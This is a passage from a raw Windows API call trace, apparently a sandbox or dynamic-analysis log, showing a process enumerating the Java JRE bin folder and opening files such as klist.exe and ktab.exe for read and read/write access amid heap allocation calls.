(in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\kinit.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\kinit.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040)) returned 1 [0093.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46748 | out: hHeap=0x20000) returned 1 [0093.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0093.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0093.239] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.239] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.239] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="klist.exe", cAlternateFileName="")) returned 1 [0093.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.239] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.239] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0093.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0093.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0093.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0093.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0093.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0093.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0093.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0093.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0093.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0093.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0093.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0093.240] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.240] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.240] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.240] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0093.240] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.240] AreFileApisANSI () returned 1 [0093.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe", lpUsedDefaultChar=0x0) returned 49 [0093.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0093.240] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.240] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0093.240] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0093.240] AreFileApisANSI () returned 1 [0093.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0093.241] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46a58 [0093.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46a58, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe") returned 49 [0093.241] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\klist.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.241] GetFileType (hFile=0x360) returned 0x1 [0093.241] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0093.241] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.241] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.241] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.241] CloseHandle (hObject=0x360) returned 1 [0093.242] AreFileApisANSI () returned 1 [0093.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0093.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x464a8 [0093.242] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x464a8, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe") returned 49 [0093.242] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\klist.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.242] GetFileType (hFile=0x360) returned 0x1 [0093.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0093.242] CloseHandle (hObject=0x360) returned 1 [0093.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.242] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.242] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.243] AreFileApisANSI () returned 1 [0093.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0093.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46208 [0093.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46208, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe") returned 49 [0093.243] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\klist.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\klist.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040)) returned 1 [0093.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0093.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0093.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.243] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0093.243] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.243] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.243] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89c8466, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89c8466, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89c8466, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ktab.exe", cAlternateFileName="")) returned 1 [0093.243] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0093.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0093.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0093.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0093.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0093.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0093.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0093.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0093.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0093.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0093.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0093.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.244] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0093.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0093.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.244] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.244] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0093.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.245] AreFileApisANSI () returned 1 [0093.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe", lpUsedDefaultChar=0x0) returned 48 [0093.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0093.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.245] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0093.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0093.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0093.245] AreFileApisANSI () returned 1 [0093.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.245] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0093.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe") returned 48 [0093.245] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ktab.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.245] GetFileType (hFile=0x360) returned 0x1 [0093.245] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0093.245] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0093.246] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0093.246] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0093.246] CloseHandle (hObject=0x360) returned 1 [0093.246] AreFileApisANSI () returned 1 [0093.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0093.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe") returned 48 [0093.246] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\ktab.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\ktab.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0093.246] GetFileType (hFile=0x360) returned 0x1 [0093.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0093.246] CloseHandle (hObject=0x360) returned 1 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0093.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0093.247] AreFileApisANSI () returned 1 [0093.248] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0093.248] RtlAllocateHeap 